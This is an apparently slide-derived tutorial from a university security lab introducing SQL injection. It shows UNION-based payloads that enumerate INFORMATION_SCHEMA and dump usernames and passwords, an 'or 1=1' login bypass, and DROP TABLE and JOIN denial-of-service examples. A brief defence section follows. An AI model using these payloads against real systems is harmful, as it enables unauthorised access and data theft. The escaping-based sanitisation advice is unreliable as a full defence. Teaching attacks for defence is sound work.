Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.htm l
A Brief Introduction in SQL Injection
Nov 19, 2014
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Security Lab, University Putra Malaysia23 May 2013 Sina Manavi
Contact:http://sinamanavi.blogspot.com/p/about-me.html
• Introduction• Why SQL Injection• What is needed for this• What you can do with SQL Injection• What are its pros and cons• Why we need to know and how we can prevent our
database from SQL injection attacks
We are all familiar with SQL Language One of the technology that helped in converting the static
web to dynamic oneSQL is relatively easy to read, a little more difficult to writeWorks on Servers such as Apache, MS Server, etc.
SQL Injection means manipulate SQL tables with unauthorized access
SQL Injection may happen only two form of UI based or URL based◦ (1) Injecting into a form. Such as username and
password boxes on a login page.
◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php?pid=10
Simple example:
Select ID from tbl_users◦ Where ID=“Uid” and pass=“pass”
◦ If it returns any value means that the current inputs are correct
www.yourtarget.com/list?id=5
if you want to view a record from a table by the URL based injection: Select * from tbl_users
Where id=5
The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change.◦ Tables holding all the tables name:
"INFORMATION_SCHEMA.TABLES.“
◦ Tables holding all the Column name: "INFORMATION_SCHEMA.COLUMNS.“
Finding the URL quantity:◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1--Increase the 1 , until you got error, then the last number is
the column number Finding Table name◦ www.yourtarget.com/list.php? ID=-
1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
And it shows:tbl_user
To Be continued
Now its time to find out the Column names:www.yourtarget.com/list.php? ID =
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=‘tbl_user'--
The result would be as following : id,username,password
Column names finding step: www.yourtarget.com/list.php? ID =
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS
+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'—
Try the columns name until you find your target (e.g username,password, or login)
And Finally its time to see the records:◦ www.yourtarget.com/list.php? =-
1+UNION+SELECT+1,username,3+FROM+UserAccounts—
And ◦ www.yourtarget.com/list.php? =-
1+UNION+SELECT+1,password,3+FROM+UserAccounts—
◦ Username=admin password=123456
◦ Stupid admin ha ;)
Now we can Alter the records as well, lets rock
UPDATE tbl_userSET password = SHA2('$password')WHERE id = $idOr we can Insert a new user with Insert
Command
If user_list contains 1000 records then, the database is fired up
SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
Insert newuser into tbl_user
The maliciouse code can be :
DROP table tbl_user
How it worksSelect * from tbl_users
Where id=“Fname” and pass=“pass” Malicious Code:SELECT * FROM table WHERE id= ‘Fname' or
'1'='1';if(mysql_num_rows($result))//do login
Now the unauthorized user get accessed easily and bypassed the authorization
Security is the developer’s job No database, connector, or framework can prevent SQL injection all the time
• Implement proper Error Handling. This would include using a single error message for all errors.
• Lock down User Database configuration, Specify users, roles and permissions etc.
• prefix and append a quote to all user input, even if the data is numeric .
<?phpfunction sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string);$string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string);return $string;}$password = sanitize( $_POST["password"] );mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
Vipin Samar, Oracle vice president of Database Security:
“Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
Using Stroprocedures:CREATE PROCEDURE SP_show_user(IN U_ID)BEGINSELECT * FROM Bugs WHERE User_ID= U_ID;END
CALL SP_show_user (54)
“Might be helpful but still vulnerable”
I don’t have to worry anymore Escaping is the fixthe fix More escaping is better I can code an escaping function Only user input is unsafe Stored procs are the fixthe fix SQL privileges are the fixthe fix My app doesn’t need security Frameworks are the fixthe fix Parameters quote for you Parameters are the fixthe fix Parameters make queries slow SQL proxies are the fixthe fix NoSQL databases are the fixthe fix
NoSQL databases are immune to SQL injection.
Related Documents
